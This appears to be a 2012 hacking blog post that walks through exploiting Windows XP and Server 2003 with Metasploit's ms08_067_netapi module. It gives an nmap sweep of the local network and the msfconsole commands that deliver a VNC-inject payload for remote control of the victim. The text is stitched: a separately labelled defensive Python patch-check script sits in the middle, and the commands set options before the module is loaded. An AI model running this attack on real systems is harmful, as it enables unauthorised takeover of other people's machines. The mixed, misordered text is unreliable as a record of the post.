Sunday 24 June 2012

TARGET XP - METASPLOIT

Everyone has probably heard of the Metasploit framework. Metasploit was originally written in Perl, but later it was rewritten in Ruby. It is basically a large database of exploit code, scanners, encoders and payloads.

target: Windows XP SP2 (this exploit also works with Windows Server 2003 and Windows XP SP3)

exploit: ms08_067_netapi


my OS: BackTrack 5 R2

so this is what msfconsole looks like -->




I recommend using Metasploit on Linux, or at least in a Linux virtual machine; the Windows version isn't that powerful.

so after firing up metasploit this is what we do 

CODE : 

nmap -sS -Pn -A 192.168.1.1/24


Assuming your local address is in the range I used, this command port-scans your local area network to find live hosts and reports the open ports and the services (daemons) running on them (-sS is a SYN scan, -Pn skips host discovery, and -A adds OS and service version detection, which is what tells you which hosts are XP or Server 2003).
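As an added defender-side example (not code from the original post), here is a small Python script that reads nmap's normal output from a scan like the one above and lists the hosts that expose SMB on the XP / Server 2003 families this post names, so they can be checked for the MS08-067 patch (KB958644). The scan text is a constructed sample, not real scan data.

```python
import re

# Constructed sample of nmap normal-format output (not from a real scan).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.1.10
PORT     STATE SERVICE      VERSION
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP SP2 or SP3
Nmap scan report for 192.168.1.20
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.9p1 Debian
OS details: Linux 3.2 - 3.5
Nmap scan report for 192.168.1.30
PORT     STATE  SERVICE
445/tcp  closed microsoft-ds
OS details: Microsoft Windows Server 2003 SP1 or SP2
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\w+)")
OS_RE = re.compile(r"^OS details: (.+)$")
# OS families the post names as affected by MS08-067 (XP and Server 2003).
AFFECTED_OS = re.compile(r"Windows (XP|Server 2003)", re.IGNORECASE)


def parse_nmap(text):
    """Map each host to whether 445/tcp is open and what OS nmap guessed."""
    hosts, current = {}, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            current = hosts.setdefault(m.group(1), {"smb_open": False, "os": ""})
        elif current is None:
            continue
        elif (m := PORT_RE.match(line)) and m.group(1) == "445":
            current["smb_open"] = m.group(2) == "open"
        elif m := OS_RE.match(line):
            current["os"] = m.group(1)
    return hosts


def needs_ms08_067_patch(hosts):
    """Hosts exposing SMB on an affected OS: verify KB958644 is installed."""
    return sorted(h for h, info in hosts.items()
                  if info["smb_open"] and AFFECTED_OS.search(info["os"]))


if __name__ == "__main__":
    for host in needs_ms08_067_patch(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(host, "-> check that MS08-067 (KB958644) is installed")
```

A host with 445/tcp closed (like the Server 2003 box in the sample) is not listed, since the vulnerable service is not reachable; it still needs the patch, but it is not exposed to the network.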

after finding an XP SP2 / SP3 / Windows Server 2003 system ... -->

CODE : 

set RHOST <local IP of the remote host>


CODE : 

set LHOST 192.168.1.1


CODE : 

set THREADS 100


CODE : 

use windows/smb/ms08_067_netapi


at this point you should get a prompt like this:
msf exploit(ms08_067_netapi) >

use the `show payloads` command to get a list of suitable payloads.
I'm going to use a reflective VNC injection:

CODE : 

set PAYLOAD windows/vncinject/bind_tcp


all set now.
type in `exploit`,
and if the exploit succeeds
you will get a VNC session.


now THE ABOVE MENTIONED ARTICLES ARE ONLY FOR EDUCATIONAL PURPOSES 
AND POST YOUR COMMENTS KINDLY
